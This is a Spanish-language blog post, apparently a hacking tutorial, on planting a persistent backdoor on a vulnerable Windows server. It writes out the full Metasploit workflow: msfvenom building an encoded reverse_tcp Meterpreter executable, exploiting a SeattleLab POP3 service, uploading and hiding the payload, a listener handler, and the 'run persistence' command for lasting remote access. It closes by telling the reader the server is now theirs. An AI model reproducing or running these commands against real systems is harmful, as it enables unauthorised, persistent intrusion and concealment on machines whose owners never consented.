Advertisement

header ads

SUBIR TU PROPIO EXPLOIT A UN SERVIDOR VULNERABLE Y CONVERTIRLO EN PERSISTENTE

Este método te puede ser útil al obtener acceso a un servidor vulnerable y querer dejar tu pequeño exploit para volver acceder al servidor.



Antes de empezar quiero que te enfoques en los anteriores post para que tengas una idea lo que hable.
Pincha aquí.
Persistente pincha aquí.
Imaginemos que tenemos un servidor windows vulnerable y que pasaría si ese servidor termina parchado? Bueno vamos a empezar por ahí.
Primeramente explotamos el servidor y según la vulnerabilidad ya sea smb-vuln-ms08-067.nse como Smail.
Al acceder a meterpreter vamos a crear nuestro exploit lo mismo que hicimos en el anterior post.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=6666 -f exe -e x86/shikata_ga_nai -i 9 -o creadpag.exe
Ahora explotemos el server.
msfconsole -q
use exploit/windows/pop3/seattlelab_pass
set RHOST 192.168.1.6
exploit
Ahora subimos nuestro exploit al servidor.
upload /root/Desktop/creadpag.exe C:\\
Recuerda que al transferir el exploit tienes que colocar doble “\\” entonces ahora vamos abrir otro msfconsole para tener acceso al servidor. También recuerda esconderlo bien.
En caso de descargar algo usa.
download c:\\creadpag.exe /root/Desktop
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.
set LPORT 6666
exploit
Desde la consola de la vulnerabilidad ejecuta el exploit creadpag.exe para que la otra consola reciba el mensaje y tener acceso.
Ahora usarlo como persistente
run persistence -U -i 5 -p 666 -r 192.168.1.8
Listo! cierra la consola de la vulnerabilidad y no cierres la consola del exploit creado, ahora ejecuta el persistente.
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 666
exploit
Listo! ahora es tu servidor y no te olvides no perder el servidor, puedes visitar otros post y no te olvides de darle mucho amor. COMPÁRTELO!

Publicar un comentario

0 Comentarios